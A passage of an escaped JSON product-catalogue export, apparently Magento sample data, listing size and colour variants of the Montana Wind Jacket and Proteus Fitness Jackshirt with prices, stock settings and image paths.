"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"365\":{\"sku\":\"MJ03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-XL-Green\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"366\":{\"sku\":\"MJ03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-XL-Red\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"367\":{\"sku\":\"MJ03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Lightweight|Hooded|Hard Shell|Windbreaker|Full zip,material=Nylon|Polyester,pattern=Solid,climate=Cool|Mild|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ03-XS-Black,size=XS,color=Black|sku=MJ03-XS-Green,size=XS,color=Green|sku=MJ03-XS-Red,size=XS,color=Red|sku=MJ03-S-Black,size=S,color=Black|sku=MJ03-S-Green,size=S,color=Green|sku=MJ03-S-Red,size=S,color=Red|sku=MJ03-M-Black,size=M,color=Black|sku=MJ03-M-Green,size=M,color=Green|sku=MJ03-M-Red,size=M,color=Red|sku=MJ03-L-Black,size=L,color=Black|sku=MJ03-L-Green,size=L,color=Green|sku=MJ03-L-Red,size=L,color=Red|sku=MJ03-XL-Black,size=XL,color=Black|sku=MJ03-XL-Green,size=XL,color=Green|sku=MJ03-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Lightweight|Hooded|Hard Shell|Windbreaker|Full zip\",\"material\":\"Nylon|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Mild|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"368\":{\"sku\":\"MJ12-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XS-Black\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"369\":{\"sku\":\"MJ12-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XS-Blue\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"370\":{\"sku\":\"MJ12-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-XS-Orange\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj12-orange_alt1.jpg,\\/m\\/j\\/mj12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"371\":{\"sku\":\"MJ12-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-S-Black\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"372\":{\"sku\":\"MJ12-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-S-Blue\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"373\":{\"sku\":\"MJ12-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Proteus Fitness Jackshirt-S-Orange\",\"description\":\"<p>Part jacket, part shirt, the Proteus Fitness Jackshirt makes an ideal companion for outdoor training, camping or loafing on crisp days. Natural Cocona&reg; technology brings breathable comfort and increased dryness along with UV protection and odor management. The drop-tail hem provides extra coverage when you\'re riding a bike or replacing a sink valve.<\\/p>\\n<p>&bull; 1\\/4 zip. Stand-up collar. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Quilted inner layer.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"proteus-fitness-jackshirt-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decima